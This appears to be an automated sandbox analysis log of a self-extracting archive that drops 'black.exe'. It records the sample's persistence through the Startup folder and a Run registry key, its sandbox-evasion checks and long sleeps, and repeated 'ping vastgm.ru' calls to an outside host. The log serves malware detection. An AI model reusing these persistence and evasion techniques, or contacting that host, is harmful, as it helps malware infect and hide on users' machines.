Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: unknown | Process created: C:\Users\user\AppData\Roaming\black.exe "C:\Users\user\AppData\Roaming\black.exe"
Source: C:\Users\user\AppData\Roaming\black.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\black.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Y5kEUsYDFr.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Y5kEUsYDFr.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Y5kEUsYDFr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Y5kEUsYDFr.exe
Source: Y5kEUsYDFr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Y5kEUsYDFr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Y5kEUsYDFr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Y5kEUsYDFr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Y5kEUsYDFr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: black.exe.0.dr | Static PE information: 0x921DD1B1 [Sat Sep 7 00:09:21 2047 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .%?T
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_7010812
Source: Y5kEUsYDFr.exe | Static PE information: section name: .didat
Source: Y5kEUsYDFr.exe | Static PE information: section name: _RDATA
Source: black.exe.0.dr | Static PE information: section name: .|]Y
Source: black.exe.0.dr | Static PE information: section name: .z~z
Source: black.exe.0.dr | Static PE information: section name: .%?T
Source: black.exe.1.dr | Static PE information: section name: .|]Y
Source: black.exe.1.dr | Static PE information: section name: .z~z
Source: black.exe.1.dr | Static PE information: section name: .%?T
Source: black.exe0.1.dr | Static PE information: section name: .|]Y
Source: black.exe0.1.dr | Static PE information: section name: .z~z
Source: black.exe0.1.dr | Static PE information: section name: .%?T
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CAA05156 push rsi; retf 0_2_00007FF6CAA05157
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CAA05166 push rsi; retf 0_2_00007FF6CAA05167
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023A81F0 pushfd ; retn 2812h 1_2_023A8220
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_046C0DC1 pushad ; retf 7_2_046C0DD9
Source: black.exe.0.dr | Static PE information: section name: .%?T entropy: 7.730962970796143
Source: black.exe.1.dr | Static PE information: section name: .%?T entropy: 7.730962970796143
Source: black.exe0.1.dr | Static PE information: section name: .%?T entropy: 7.730962970796143
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | File created: C:\Users\user\AppData\Roaming\black.exe
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run black
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\black.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\black.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\black.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: CD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: 2520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: 4520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: 4A70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: 6A70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: 6CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: 8CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 2530000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 2670000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 4670000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 4C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 6C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 6ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\black.exe | Memory allocated: 8ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\black.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Window / User API: threadDelayed 2118
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Window / User API: threadDelayed 1185
Source: C:\Users\user\AppData\Roaming\black.exe | Window / User API: threadDelayed 2024
Source: C:\Users\user\AppData\Roaming\black.exe | Window / User API: threadDelayed 1110
Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 375
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Check user administrative privileges: GetTokenInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 2596 | Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 2596 | Thread sleep time: -59000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 5900 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 3164 | Thread sleep count: 2118 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 2696 | Thread sleep count: 276 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 6364 | Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 6364 | Thread sleep time: -42000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 348 | Thread sleep count: 109 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 5900 | Thread sleep count: 124 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 5900 | Thread sleep time: -124000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 6988 | Thread sleep count: 1185 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe TID: 4944 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\black.exe TID: 792 | Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Roaming\black.exe TID: 792 | Thread sleep time: -45000s >= -30000s
Source: C:\Users\user\AppData\Roaming\black.exe TID: 4924 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5896 | Thread sleep count: 2024 > 30
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5420 | Thread sleep count: 71 > 30
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5420 | Thread sleep time: -71000s >= -30000s
Source: C:\Users\user\AppData\Roaming\black.exe TID: 2060 | Thread sleep count: 84 > 30
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5892 | Thread sleep count: 1110 > 30
Source: C:\Users\user\AppData\Roaming\black.exe TID: 4924 | Thread sleep count: 141 > 30
Source: C:\Users\user\AppData\Roaming\black.exe TID: 4924 | Thread sleep time: -141000s >= -30000s
Source: C:\Users\user\AppData\Roaming\black.exe TID: 5876 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9D40BC
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9EB190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9FFCA0 FindFirstFileExA,0_2_00007FF6CA9FFCA0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F16A4 VirtualQuery,GetSystemInfo,0_2_00007FF6CA9F16A4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Roaming\black.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\black.exe | Thread delayed: delay time: 120000
